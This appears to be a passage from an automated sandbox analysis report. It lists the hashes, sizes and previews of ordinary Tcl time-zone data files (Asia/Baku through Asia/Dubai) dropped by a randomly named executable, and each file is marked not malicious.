                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Baku) {.. {-9223372036854775808 11964 0 LMT}.. {-1441163964 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 14400 0 +04}.. {820440000 14400 0 +04}.. {828234000 18000 1 +05}.. {846378000 14400 0 +04}.. {852062400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.911309754748998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKELYOiMXGm2OHB+keoHvZKmrROpDovFFsQ+8EXVeVSYe:SlSWB9eg/2wKELeDm2OHxeoHvZ3FO1og
                                                                                                                                                                                                                              MD5:9AC4947AC29C797055B7EBFA4F6AC710
                                                                                                                                                                                                                              SHA1:E7758A9A8BFA255F6B2D27F5366D9FE2A26DDF6C
                                                                                                                                                                                                                              SHA-256:6E72BA908F250FD45D554A12E3E7B3BD2F1C02A6C2431F806FD2A054F843AA90
                                                                                                                                                                                                                              SHA-512:F9D0F0CB7D3726C2AB3B5049429172D9DD4BA21353F6F98570CBA4EE969F7D97BD973CB165AECFF930AFFA8633E8052624D44EE7FB91763681ED3F78A61F4F98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bangkok) {.. {-9223372036854775808 24124 0 LMT}.. {-2840164924 24124 0 BMT}.. {-1570084924 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7025684250364725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5VeTtXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEnsr:5n40yVRB7VfXucdKmtTTDOV
                                                                                                                                                                                                                              MD5:6CC13B6910412A3A3D16CA36ADF00352
                                                                                                                                                                                                                              SHA1:061CF4A8FEA8C139F50F96E6B6506B50ED3DD792
                                                                                                                                                                                                                              SHA-256:992F93A7975F8CD4E94D96B3BA1ECFB3585E52A53F4442A15993402D3F955F66
                                                                                                                                                                                                                              SHA-512:4E9750B1C3C0BA4F7922BCBC76276A3E74031D78A98E21DC59F66D6EA8E1B70865BBEB50A6B77EB0423421A18428B97B47412053CE15213128CEED669F4DD6E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Barnaul) {.. {-9223372036854775808 20100 0 LMT}.. {-1579844100 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {76470
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8024
                                                                                                                                                                                                                              Entropy (8bit):3.7230911686481774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4nBKPP8LFH0TDkywaZb1QSCK5VUjiO1PoBQpo7778CZicJZS80EGcLt4Mok1MgJl:4M38LCRZb+sAiO1PoBQpo1ikjD
                                                                                                                                                                                                                              MD5:1D99E2BBB01B1669403CFBAF7E03F733
                                                                                                                                                                                                                              SHA1:DBDD58C7FD195FC602C4541D6F416CC96094C121
                                                                                                                                                                                                                              SHA-256:17AF14646D562AFE17DCCFD1D2FBA95C122F3E0263906A36EB48BFF04ACF233E
                                                                                                                                                                                                                              SHA-512:98524E8DCD17C090058F17BDA1200D9801EB1B14EB5CEB8C31149A4A402A53BA4923A2AFF457E0A72DAA601D88095247806F945F704000F874FCBF73631DD135
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Beirut) {.. {-9223372036854775808 8520 0 LMT}.. {-2840149320 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1473645600 10800 1 EEST}.. {-1460948400 7200 0 EET}.. {-399866400 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336794400 10800 1 EEST}.. {-323578800 7200 0 EET}.. {-305172000 10800 1 EEST}.. {-291956400 7200 0 EET}.. {-273636000 10800 1 EEST}.. {-260420400 7200 0 EET}.. {78012000 10800 1 EEST}.. {86734800 7200 0 EET}.. {105055200 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {212965200 7200 0 EET}.. {231285600 10800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1669
                                                                                                                                                                                                                              Entropy (8bit):3.7443715330695735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5qvdJqxiF0rvK5XvV4vUzvCjvT7voPvkPvJUbvn0vYpv99v3uvuWvKJhv3T:Ad1mzK5/VkULCbTjoHkHJUDnQYV9p3mO
                                                                                                                                                                                                                              MD5:1EE8FF3DF0D931A140ADBB021EB3BFEB
                                                                                                                                                                                                                              SHA1:F1F15EF70C4E9F456849AF89CAC97AD747D9E192
                                                                                                                                                                                                                              SHA-256:1D5E9A8F6A04273AF741F648EF10718B004A60D7884FE432DDF85A8F558BEA98
                                                                                                                                                                                                                              SHA-512:155539A5CF21A34FBFACBF1652D934BF32255F4E505E60B3B4D8B5F2F7FAE552E6CB4824D8608A9C56370F58E48702335995BBD16B7A296A86A72A615FBC8ABC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bishkek) {.. {-9223372036854775808 17904 0 LMT}.. {-1441169904 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {683586000 18000 0 +05}.. {703018800 21600 1 +05}.. {717530400 18000 0 +05}.. {734468400 21600 1 +05}.. {748980000 18000 0 +05}.. {765918000 21600 1 +05}.. {78042
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.949517569857329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kLP/vXHAIgN16L1RL/2WFKXeAMM7QWFKPLPyn:SlSWB9vsM3yELPHAIg+L1N/2wK0oQwKW
                                                                                                                                                                                                                              MD5:716D842F23974137C5E07A1A65CEFC5D
                                                                                                                                                                                                                              SHA1:C7248C9DBD6AE5AF33BD4B3602D17737EBE023A0
                                                                                                                                                                                                                              SHA-256:F3110E9DD514E3654A9DE777E22B2D2391692927954B4B7E42ED54AB665C3CF5
                                                                                                                                                                                                                              SHA-512:4EC012EAABE60728D9447EEDF4BA7B16CA82786AA39EE79B2F9B32F227F9816FCE42F173153261F9AF88A12209752E84EBD7170C54D126C2DBB1ED3A8D069668
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kuching)]} {.. LoadTimeZoneFile Asia/Kuching..}..set TZData(:Asia/Brunei) $TZData(:Asia/Kuching)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.774027471796823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq864DyXHAIgN1QvRL/2WFKh0s+WFKvovn:SlSWB9vsM3ya4DSHAIgcvN/2wKN+wKvy
                                                                                                                                                                                                                              MD5:8BB098AB77CB0469B1FA0E0B64C4A9E7
                                                                                                                                                                                                                              SHA1:88C73626985071DD0923E1CAB343ACCD854A7297
                                                                                                                                                                                                                              SHA-256:1BAEF7850111D2C33B2A766A8AE804534ABA1711BF80A4087A89656DDD8469D5
                                                                                                                                                                                                                              SHA-512:82216A7F787AF20A4C97C7AA754CD6BE979FEF24137CF9A8B18EECA5E8FBCF12834DD8A6FC9CD2357D807F1629806745B46B11DC0472E0284E18DCCC983897DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kolkata)]} {.. LoadTimeZoneFile Asia/Kolkata..}..set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2086
                                                                                                                                                                                                                              Entropy (8bit):3.6981807774781017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Bpr1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2M:95PhtjLiII2ZFlgd
                                                                                                                                                                                                                              MD5:69E03A5CEB689E19B60168C0F7EBAE8E
                                                                                                                                                                                                                              SHA1:95C6396EB753753B4FE4AE1B98D76332523E72A4
                                                                                                                                                                                                                              SHA-256:10B6F435B05D887176A4D90CA5AC957F327F62F36F15D6F6E4F81844662429B9
                                                                                                                                                                                                                              SHA-512:DFA72EDC54A11F0840ADBEE7F5AD8EA472AA52A1F196292F1341CD92A68FB2EC0A5BC7DE6C8E83C975420DB4B76CECD4393370FDB2C09F86EC11A50E540F6F02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Chita) {.. {-9223372036854775808 27232 0 LMT}.. {-1579419232 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647012
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1619
                                                                                                                                                                                                                              Entropy (8bit):3.775783980828041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5th5fSW2sp4Qh2rRSQnGw7GywvWbC25XrMYWG4AIQTUhp9pkTGdXguHaena44XY5:rh5kpmWG29QFUmD
                                                                                                                                                                                                                              MD5:540A7304A62ABB8D7F84454ABD6E2556
                                                                                                                                                                                                                              SHA1:52C37529929218A668D7A4AD6FD1B5FE0A727E16
                                                                                                                                                                                                                              SHA-256:94B2C14EF45C695EF6B19D94722E1BCBB629A595F2866DBA80F00A66721040B5
                                                                                                                                                                                                                              SHA-512:3B535D109DB369E301D6B412F21EC990976B997826F22B2E16ECEEEB048D60F064C7CA1A616393DC2F1B491BAC0548DC0965B9EA149A95280FFDBCAD6726EF0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Choibalsan) {.. {-9223372036854775808 27480 0 LMT}.. {-2032933080 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 36000 0 +09}.. {433778400 32400 0 +09}.. {449593200 36000 1 +09}.. {465314400 32400 0 +09}.. {481042800 36000 1 +09}.. {496764000 32400 0 +09}.. {512492400 36000 1 +09}.. {528213600 32400 0 +09}.. {543942000 36000 1 +09}.. {559663200 32400 0 +09}.. {575391600 36000 1 +09}.. {591112800 32400 0 +09}.. {606841200 36000 1 +09}.. {622562400 32400 0 +09}.. {638290800 36000 1 +09}.. {654616800 32400 0 +09}.. {670345200 36000 1 +09}.. {686066400 32400 0 +09}.. {701794800 36000 1 +09}.. {717516000 32400 0 +09}.. {733244400 36000 1 +09}.. {748965600 32400 0 +09}.. {764694000 36000 1 +09}.. {780415200 32400 0 +09}.. {796143600 36000 1 +09}.. {811864800 32400 0 +09}.. {828198000 36000 1 +09}.. {843919200 32400 0 +09}.. {8596
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.865222436335267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKh2V7/4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKho4wKU
                                                                                                                                                                                                                              MD5:C5DC40C6325391F7247251ADB2C07F78
                                                                                                                                                                                                                              SHA1:3DDB1BF94532FB1F1271095B9C8CAA779BC545EF
                                                                                                                                                                                                                              SHA-256:A87382DC5F3C3141547A65E3746AF1DAF94B51468B96DA6CEF30E95754C97D37
                                                                                                                                                                                                                              SHA-512:062FF8D5E5392E5372B0405EDF3C7CF997AC33F95EBFFAA9CC9AB82BBE27B60C80255FCCEE9E6F5E02CBFCB163F99984BB2103217FFD1F80BDEC5C684BF2F61A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chongqing) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.889115378893491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFK7LeL9J4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wK7LUT4wj
                                                                                                                                                                                                                              MD5:C3676771EB813B346F58A7B574D0D7B5
                                                                                                                                                                                                                              SHA1:A473EF621309E019F29F3DEF95C38593775B8404
                                                                                                                                                                                                                              SHA-256:D6D2B4A761C547F1F853AE901AC71AB49FBE825037079C4E0C89DC940AE4A822
                                                                                                                                                                                                                              SHA-512:21C3A5D499E6E0427FBF585CA8CC5D99D193C586483AB107C4D8E9F9DC8412021E8E019A314757DAFE1225D2635F6D48E9C54A511709863F22A02449FA201E02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chungking) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                                              Entropy (8bit):4.465596050904646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKr+iDm2OHgoHvZv9tdvjSWV/FSQipPUrKkTD/k5QqRVVFSQOR/UIp:MB862zZmdHgCvZvJvj1Nj+Phkv/YtvjA
                                                                                                                                                                                                                              MD5:9541BB43E79AB0C6E8163945B5BFB1BF
                                                                                                                                                                                                                              SHA1:C4994420DB8313DECDE19B4B9F6C5DB0126A95A7
                                                                                                                                                                                                                              SHA-256:E5B5E6D607A15DA65CB00C92C35A63EAF25F547E64CB34BB419CB8CFC2714B1B
                                                                                                                                                                                                                              SHA-512:46F623B3F7CF8A50F97DD812521398EB9100C9CDFB967C18EF1BD112306AAEB3C9CB224424E48611CB8CC21D1DC3D820DD83032D12BC9DF19301CF07786FA664
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Colombo) {.. {-9223372036854775808 19164 0 LMT}.. {-2840159964 19172 0 MMT}.. {-2019705572 19800 0 +0530}.. {-883287000 21600 1 +06}.. {-862639200 23400 1 +0630}.. {-764051400 19800 0 +0530}.. {832962600 23400 0 +0630}.. {846266400 21600 0 +06}.. {1145039400 19800 0 +0530}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):169
                                                                                                                                                                                                                              Entropy (8bit):4.786111096226559
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ntyXHAIgN6KyFvRL/2WFK1S2WFKwBn:SlSWB9vsM3yHtSHAIgMKON/2wKM2wKwB
                                                                                                                                                                                                                              MD5:BA575D37459540907A644438071277F8
                                                                                                                                                                                                                              SHA1:14CF10D6AABBAF7BAE42B3B9641D8469C206567F
                                                                                                                                                                                                                              SHA-256:B3AD560F66EA330E54A147017E6E6AB64452A5255D097B962D540836D7B19EE7
                                                                                                                                                                                                                              SHA-512:9CA386EF4D812B00C2E63558B81B273F92BBCA98AF304C9FD6FC166210FC4E2F92B769E1D6FB96B670650DC76EFFAD2FC6E39AE12C24B47EAED4E50A2AFAC2D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dhaka)]} {.. LoadTimeZoneFile Asia/Dhaka..}..set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3692
                                                                                                                                                                                                                              Entropy (8bit):3.7832279883701254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:59xu6+RYla5W87rtYV08a7bd+dYV004X7JkX3Q0dzPeP2ua/XAog7jP/xZsNaTvT:8YI5WpVAdVGlkBOLh8X0CkBheIFlR
                                                                                                                                                                                                                              MD5:1D6B2CC38669C0F7378D9A576F10C477
                                                                                                                                                                                                                              SHA1:09A31E6295D9FC39219DFA4FC598B46F55C41180
                                                                                                                                                                                                                              SHA-256:7E577F0F9DA459BA1A325BE95C1FA0DB2C6ECFC1D64CDB73F3ADB09588293BA7
                                                                                                                                                                                                                              SHA-512:A0BBD5CE7883C275BF9752C75BA0C9AF0181046D94D27EFC96EC8823C374BADCB69B2B11D2C4497295E5BC25D5790634C69C6E7185F406F2107A8E16044E670F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Damascus) {.. {-9223372036854775808 8712 0 LMT}.. {-1577931912 7200 0 EET}.. {-1568592000 10800 1 EEST}.. {-1554080400 7200 0 EET}.. {-1537142400 10800 1 EEST}.. {-1522630800 7200 0 EET}.. {-1505692800 10800 1 EEST}.. {-1491181200 7200 0 EET}.. {-1474243200 10800 1 EEST}.. {-1459126800 7200 0 EET}.. {-242265600 10800 1 EEST}.. {-228877200 7200 0 EET}.. {-210556800 10800 1 EEST}.. {-197427600 7200 0 EET}.. {-178934400 10800 1 EEST}.. {-165718800 7200 0 EET}.. {-147398400 10800 1 EEST}.. {-134269200 7200 0 EET}.. {-116467200 10800 1 EEST}.. {-102646800 7200 0 EET}.. {-84326400 10800 1 EEST}.. {-71110800 7200 0 EET}.. {-52704000 10800 1 EEST}.. {-39488400 7200 0 EET}.. {-21168000 10800 1 EEST}.. {-7952400 7200 0 EET}.. {10368000 10800 1 EEST}.. {23583600 7200 0 EET}.. {41904000 10800 1 EEST}.. {55119600 7200 0 EET}.. {73526400 10800 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):364
                                                                                                                                                                                                                              Entropy (8bit):4.412125512631861
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKwiDm2OHEmVFnoHv9vX+Yl7UIFckVVFSQiL/FG/UIvy/Ur9i/Ur97:MB862Y2mdHzdCv9P+Y9vvjeQlP9/9VkK
                                                                                                                                                                                                                              MD5:B5496A038AC230B9D75AA22BB2BE6BDD
                                                                                                                                                                                                                              SHA1:ACFD9C78F803F344272E8E188C41ED969EBADA16
                                                                                                                                                                                                                              SHA-256:BFC4562055CC4355E79F9EFAA580A4C6A658285916159A5D390A0CDA96A97E98
                                                                                                                                                                                                                              SHA-512:AB05D0176DADC1ED03CC526C372B9827A5FA03459E4F4B4365C6CE4B6FBDA043514A9D3FE2DA747159C5A1BC0E07727E6578A101E42B4DB120AF9624368C5FEA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dhaka) {.. {-9223372036854775808 21700 0 LMT}.. {-2524543300 21200 0 HMT}.. {-891582800 23400 0 +0630}.. {-872058600 19800 0 +0530}.. {-862637400 23400 0 +0630}.. {-576138600 21600 0 +06}.. {1230746400 21600 0 +06}.. {1245430800 25200 1 +06}.. {1262278800 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                                              Entropy (8bit):4.597480383845617
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKCXeSDm2OHnBGeoH1mpvyvScHTU71avScr:MB862qXbmdHnBvC1SyHHq8Hr
                                                                                                                                                                                                                              MD5:316DDF860FA234621698EB473E558DB7
                                                                                                                                                                                                                              SHA1:35BF955F764555945CF8B314B8E881DAD6CF557B
                                                                                                                                                                                                                              SHA-256:8BC2E0D77AC35B6D63E11B820AC45EC23A4195ED773680C600C772FDF4B953F8
                                                                                                                                                                                                                              SHA-512:D1A8D5F1DAAB7827BDCBC14506AF8681FD1ED94C6101CC4A3C8CC2A76EA7D3649038069158C539A2007A1B0734FBD87DE120415E07A3F08F44417100C95459F5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dili) {.. {-9223372036854775808 30140 0 LMT}.. {-1830414140 28800 0 +08}.. {-879152400 32400 0 +09}.. {199897200 28800 0 +08}.. {969120000 32400 0 +09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):148
                                                                                                                                                                                                                              Entropy (8bit):4.97292023820863
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKQUMXGm2OHvkdoHsQK23NVsRYovV:SlSWB9eg/2wKQUDm2OHvsoHxVNSN
                                                                                                                                                                                                                              MD5:861BA4A0A71E6C3F71B90074275FD57C
                                                                                                                                                                                                                              SHA1:BC6FC5233340BB19AE4BD0BA563875479AC0A2B9
                                                                                                                                                                                                                              SHA-256:3DB174F1568BC23BF467A3DC7BAF8A2A2952B70653D4DE54F4DB391EC50B6925
                                                                                                                                                                                                                              SHA-512:B187735E0783F299253D9F93E002AEFF131FCCA50FB3E04CF0545B334B051D5ED978108A47C6957B608F5F93ED4CC3D69751FE0F40413719EE1C0440CD49AC76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dubai) {.. {-9223372036854775808 13272 0 LMT}.. {-1577936472 14400 0 +04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
